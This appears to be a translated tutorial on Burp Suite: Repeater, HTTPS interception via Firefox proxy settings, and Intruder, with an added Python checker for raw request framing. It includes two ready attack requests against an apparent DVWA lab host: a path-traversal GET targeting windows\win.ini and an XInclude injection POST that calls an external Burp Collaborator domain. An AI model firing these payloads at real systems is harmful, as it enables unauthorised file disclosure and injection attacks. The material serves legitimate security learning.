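I. Using Burp Suite to carry out an attack:
1. Step one: open Burp Suite:
2. Step two: click Repeater:
3. Step three: click the pencil-shaped button:
4. Enter the IP address and port number of the attack target
5. Add the attack request and carry out the attack
6. View the response
The complete interface is shown below
Note:
When adding the attack request:
1. Never modify someone else's request, otherwise it will fail!
2. The request headers and the request body must be separated by two line breaks, otherwise the request will not be sent.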
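Note 2 above is about HTTP/1.1 message framing, and a stale Content-Length after editing a body is one common way an edited request stops working. The following Python check is an added example, not part of the original post: it reports framing problems in a raw request before it is pasted into Repeater. The function name and the sample requests (host lab.example) are constructed for illustration.

```python
def check_raw_request(raw: str) -> list:
    """Return a list of framing problems found in a raw HTTP/1.1 request."""
    problems = []
    # Accept CRLF or LF from a paste. Assumption: the body is a single-line
    # form body, so normalising line endings does not change its length.
    text = raw.replace("\r\n", "\n")
    # Headers end at the first empty line; everything after it is the body.
    head, sep, body = text.partition("\n\n")
    lines = head.split("\n")

    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        problems.append("malformed request line")

    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name or name != name.strip():
            # A body glued directly under the headers shows up here.
            problems.append(f"malformed header line: {line!r}")
            continue
        headers[name.lower()] = value.strip()

    if not sep:
        problems.append("no blank line after the headers")
    if "host" not in headers:
        problems.append("missing Host header")

    declared = headers.get("content-length")
    actual = len(body.encode("utf-8"))
    if declared is None:
        if actual:
            problems.append("body present but no Content-Length")
    elif not declared.isdigit():
        problems.append("Content-Length is not a number")
    elif int(declared) != actual:
        problems.append(f"Content-Length is {declared} but body is {actual} bytes")
    return problems

# Constructed sample requests (not taken from the page).
GOOD = ("POST /guestbook HTTP/1.1\r\nHost: lab.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 27\r\n\r\nname=alice&message=hello+hi")
EDITED = GOOD.replace("hello+hi", "hello+there")   # body edited, length not updated
NO_SEP = GOOD.replace("\r\n\r\n", "\r\n")          # separator line lost

if __name__ == "__main__":
    for label, req in (("good", GOOD), ("edited", EDITED), ("no separator", NO_SEP)):
        print(label, "->", check_raw_request(req) or "ok")
```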
Finally, here are two attack requests for you:
GET attack request:
GET /vulnerabilities..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/sqli/
Connection: close
Cookie: security=low; seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1
POST attack request:
POST /vulnerabilities/xss_s/ HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Connection: close
Cookie: seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1

txtName=%3cihc%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2fpe760gj443bccsu5t0qhzp801r7tvjjk7cu2ir.burpcollaborator.net%2ffoo%22%2f%3e%3c%2fihc%3e&mtxMessage=dasdsa&btnSign=Sign+Guestbook
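II. Using Burp Suite to intercept HTTPS requests:
Website: https://www.cnblogs.com/lsdb/p/6824416.html
Using Firefox as an example:
1. Step one: open the toolbar:
2. Click Options:
3. Click General:
4. Find Network Settings and click Settings:
5. Manual proxy configuration: configure it, then click OK
6. Visit http://burp/
7. Download the certificate
III. Intercepting the relevant request in Burp Suite and sending it to Intruder
Website: https://jingyan.baidu.com/article/17bd8e522d778185ab2bb8fe.html
IV. Making Burp Suite intercept only packets for a specific website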